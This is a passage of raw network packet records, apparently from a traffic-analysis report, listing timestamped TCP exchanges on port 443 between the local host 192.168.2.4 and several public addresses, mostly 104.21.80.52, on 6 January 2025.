                                                                                                                                                                  Jan 6, 2025 23:18:24.020453930 CET50113443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:24.020504951 CET44350113104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:24.020579100 CET50113443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:24.021178007 CET50113443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:24.021188974 CET44350113104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:24.479846001 CET44350113104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:24.479913950 CET50113443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:24.481421947 CET50113443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:24.481431961 CET44350113104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:24.481642008 CET44350113104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:24.482383013 CET50113443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:24.482409954 CET50113443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:24.482414007 CET44350113104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:24.810313940 CET44350113104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:24.810363054 CET44350113104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:24.810412884 CET50113443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:24.810498953 CET50113443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:24.810511112 CET44350113104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:24.810523033 CET50113443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:24.810528040 CET44350113104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:24.986290932 CET50114443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:24.986323118 CET44350114104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:24.986512899 CET50114443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:24.986756086 CET50114443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:24.986771107 CET44350114104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:25.469476938 CET44350114104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:25.469661951 CET50114443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:25.470768929 CET50114443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:25.470779896 CET44350114104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:25.470983982 CET44350114104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:25.471780062 CET50114443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:25.471941948 CET50114443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:25.471946001 CET44350114104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:25.797956944 CET44350114104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:25.798005104 CET44350114104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:25.799073935 CET50114443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:25.801342010 CET50114443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:25.801364899 CET44350114104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:25.801374912 CET50114443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:25.801382065 CET44350114104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:26.707427025 CET4435002823.43.85.38192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:26.707496881 CET4435002823.43.85.38192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:26.707545996 CET50028443192.168.2.423.43.85.38
                                                                                                                                                                  Jan 6, 2025 23:18:26.729441881 CET4435002923.43.85.38192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:26.729535103 CET4435002923.43.85.38192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:26.729598999 CET50029443192.168.2.423.43.85.38
                                                                                                                                                                  Jan 6, 2025 23:18:27.281265974 CET50115443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:27.281310081 CET44350115104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:27.281420946 CET50115443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:27.282017946 CET50115443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:27.282028913 CET44350115104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:27.736565113 CET44350115104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:27.736639977 CET50115443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:27.737867117 CET50115443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:27.737876892 CET44350115104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:27.738106966 CET44350115104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:27.738959074 CET50115443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:27.739068985 CET50115443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:27.739097118 CET44350115104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:27.739203930 CET50115443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:27.739233971 CET44350115104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:27.739330053 CET50115443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:27.739343882 CET44350115104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:28.310571909 CET44350115104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:28.310631037 CET44350115104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:28.310712099 CET50115443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:28.310910940 CET50115443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:28.310924053 CET44350115104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:28.310935020 CET50115443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:28.310939074 CET44350115104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:28.957896948 CET50116443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:28.957938910 CET44350116104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:28.958139896 CET50116443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:28.958470106 CET50116443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:28.958481073 CET44350116104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:29.468887091 CET44350116104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:29.468954086 CET50116443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:29.470107079 CET50116443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:29.470115900 CET44350116104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:29.470314980 CET44350116104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:29.471074104 CET50116443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:29.471177101 CET50116443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:29.471204042 CET44350116104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:29.471478939 CET50116443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:29.471508980 CET44350116104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:29.472923994 CET50116443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:29.472954988 CET44350116104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:30.058120966 CET44350116104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:30.058182001 CET44350116104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:30.058314085 CET50116443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:30.058351994 CET44350116104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:30.058367014 CET50116443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:30.058367014 CET50116443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:30.058378935 CET44350116104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:30.058384895 CET44350116104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:30.197408915 CET50117443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:30.197449923 CET44350117104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:30.197539091 CET50117443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:30.197829962 CET50117443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:30.197845936 CET44350117104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:30.654783964 CET44350117104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:30.654869080 CET50117443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:30.656099081 CET50117443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:30.656109095 CET44350117104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:30.656312943 CET44350117104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:30.657324076 CET50117443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:30.657351971 CET50117443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:30.657356024 CET44350117104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:31.831779003 CET44350117104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:31.831846952 CET44350117104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:31.831914902 CET50117443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:31.832003117 CET50117443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:31.832021952 CET44350117104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:31.832034111 CET50117443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:31.832039118 CET44350117104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:42.435188055 CET50118443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:42.435231924 CET44350118104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:42.435317039 CET50118443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:42.435791016 CET50118443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:42.435802937 CET44350118104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:42.932674885 CET44350118104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:42.932749033 CET50118443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:42.934832096 CET50118443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:42.934838057 CET44350118104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:42.935034037 CET44350118104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:42.935864925 CET50118443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:42.936172009 CET50118443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:42.936201096 CET44350118104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:42.936306953 CET50118443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:42.936337948 CET44350118104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:42.936511993 CET50118443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:42.936548948 CET44350118104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:42.939060926 CET50118443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:42.939079046 CET44350118104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:43.464689016 CET44350118104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:43.464754105 CET44350118104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:43.464925051 CET50118443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:43.464962006 CET44350118104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:43.464977026 CET50118443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:43.464982033 CET44350118104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:43.465003967 CET50118443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:43.465007067 CET44350118104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:43.706573009 CET50119443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:43.706631899 CET44350119104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:43.706804037 CET50119443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:43.707186937 CET50119443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:43.707201958 CET44350119104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:44.191000938 CET44350119104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:44.191071033 CET50119443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:44.192461014 CET50119443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:44.192471027 CET44350119104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:44.192677975 CET44350119104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:44.193428993 CET50119443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:44.193445921 CET50119443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:44.193453074 CET44350119104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:44.552887917 CET44350119104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:44.552944899 CET44350119104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:44.553015947 CET50119443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:44.553066015 CET50119443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:44.553083897 CET44350119104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:44.553097010 CET50119443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:44.553102016 CET44350119104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:44.690087080 CET50120443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:44.690155983 CET44350120104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:44.690222025 CET50120443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:44.690864086 CET50120443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:44.690882921 CET44350120104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:45.270505905 CET44350120104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:45.270575047 CET50120443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:45.271836042 CET50120443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:45.271851063 CET44350120104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:45.272057056 CET44350120104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:45.272819996 CET50120443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:45.272874117 CET50120443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:45.272877932 CET44350120104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:45.563445091 CET44350120104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:45.563503981 CET44350120104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:45.563632011 CET50120443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:45.563677073 CET50120443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:45.563693047 CET44350120104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:45.563705921 CET50120443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:45.563713074 CET44350120104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:45.670583010 CET50121443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:45.670629978 CET44350121104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:45.670794010 CET50121443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:45.671111107 CET50121443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:45.671123028 CET44350121104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:46.127538919 CET44350121104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:46.127605915 CET50121443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:46.128890038 CET50121443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:46.128901005 CET44350121104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:46.129102945 CET44350121104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:46.129864931 CET50121443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:46.129884958 CET50121443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:46.129890919 CET44350121104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:46.372066975 CET44350121104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:46.372122049 CET44350121104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:46.372235060 CET50121443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:46.372349977 CET50121443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:46.372366905 CET44350121104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:46.372390032 CET50121443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:46.372394085 CET44350121104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:47.778031111 CET50122443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:47.778091908 CET44350122104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:47.778723955 CET50122443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:47.779094934 CET50122443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:47.779114962 CET44350122104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:48.265639067 CET44350122104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:48.265712976 CET50122443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:48.267102003 CET50122443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:48.267112970 CET44350122104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:48.267573118 CET44350122104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:48.268302917 CET50122443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:48.268433094 CET50122443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:48.268465996 CET44350122104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:48.268559933 CET50122443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:48.268593073 CET44350122104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:48.268666029 CET50122443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:48.268682957 CET44350122104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:48.865390062 CET44350122104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:48.865449905 CET44350122104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:48.865556002 CET50122443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:48.865592957 CET44350122104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:48.865606070 CET50122443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:48.865606070 CET50122443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:48.865616083 CET44350122104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:48.865622997 CET44350122104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:50.043446064 CET50123443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:50.043482065 CET44350123104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:50.043555021 CET50123443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:50.044198036 CET50123443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:50.044209003 CET44350123104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:50.519041061 CET44350123104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:50.519129992 CET50123443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:50.523057938 CET50123443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:50.523066998 CET44350123104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:50.523269892 CET44350123104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:50.524148941 CET50123443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:50.524343967 CET50123443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:50.524373055 CET44350123104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:50.524481058 CET50123443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:50.524516106 CET44350123104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:50.524600983 CET50123443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:50.524624109 CET44350123104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:51.004080057 CET44350123104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:51.004139900 CET44350123104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:51.004332066 CET50123443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:51.004508018 CET50123443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:51.004523993 CET44350123104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:51.004551888 CET50123443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:51.004556894 CET44350123104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:51.282962084 CET50124443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:51.282999992 CET44350124104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:51.283467054 CET50124443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:51.283796072 CET50124443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:51.283807039 CET44350124104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:51.816622972 CET44350124104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:51.816735029 CET50124443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:51.817842007 CET50124443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:51.817851067 CET44350124104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:51.818049908 CET44350124104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:51.818811893 CET50124443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:51.818871975 CET50124443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:51.818875074 CET44350124104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:52.149801016 CET44350124104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:52.149852991 CET44350124104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:52.149935961 CET50124443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:52.150013924 CET50124443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:52.150032997 CET44350124104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:52.150058985 CET50124443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:52.150063992 CET44350124104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:52.774544001 CET50030443192.168.2.4204.79.197.219
                                                                                                                                                                  Jan 6, 2025 23:18:52.774569988 CET44350030204.79.197.219192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:52.820823908 CET50031443192.168.2.4204.79.197.219
                                                                                                                                                                  Jan 6, 2025 23:18:52.820847988 CET44350031204.79.197.219192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:58.827380896 CET49981443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:58.827414036 CET4434998123.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:58.827816963 CET49982443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:58.827847958 CET4434998223.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:58.827858925 CET50028443192.168.2.423.43.85.38
                                                                                                                                                                  Jan 6, 2025 23:18:58.827863932 CET4435002823.43.85.38192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:58.828013897 CET50029443192.168.2.423.43.85.38
                                                                                                                                                                  Jan 6, 2025 23:18:58.828020096 CET4435002923.43.85.38192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:59.607508898 CET50126443192.168.2.423.44.136.141
                                                                                                                                                                  Jan 6, 2025 23:18:59.607543945 CET4435012623.44.136.141192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:59.607604980 CET50126443192.168.2.423.44.136.141
                                                                                                                                                                  Jan 6, 2025 23:18:59.607892990 CET50127443192.168.2.423.206.121.26
                                                                                                                                                                  Jan 6, 2025 23:18:59.607928991 CET4435012723.206.121.26192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:59.607980013 CET50127443192.168.2.423.206.121.26
                                                                                                                                                                  Jan 6, 2025 23:18:59.608470917 CET50126443192.168.2.423.44.136.141
                                                                                                                                                                  Jan 6, 2025 23:18:59.608481884 CET4435012623.44.136.141192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:59.608575106 CET50127443192.168.2.423.206.121.26
                                                                                                                                                                  Jan 6, 2025 23:18:59.608587027 CET4435012723.206.121.26192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:19:00.065654993 CET4435012623.44.136.141192.168.2.4
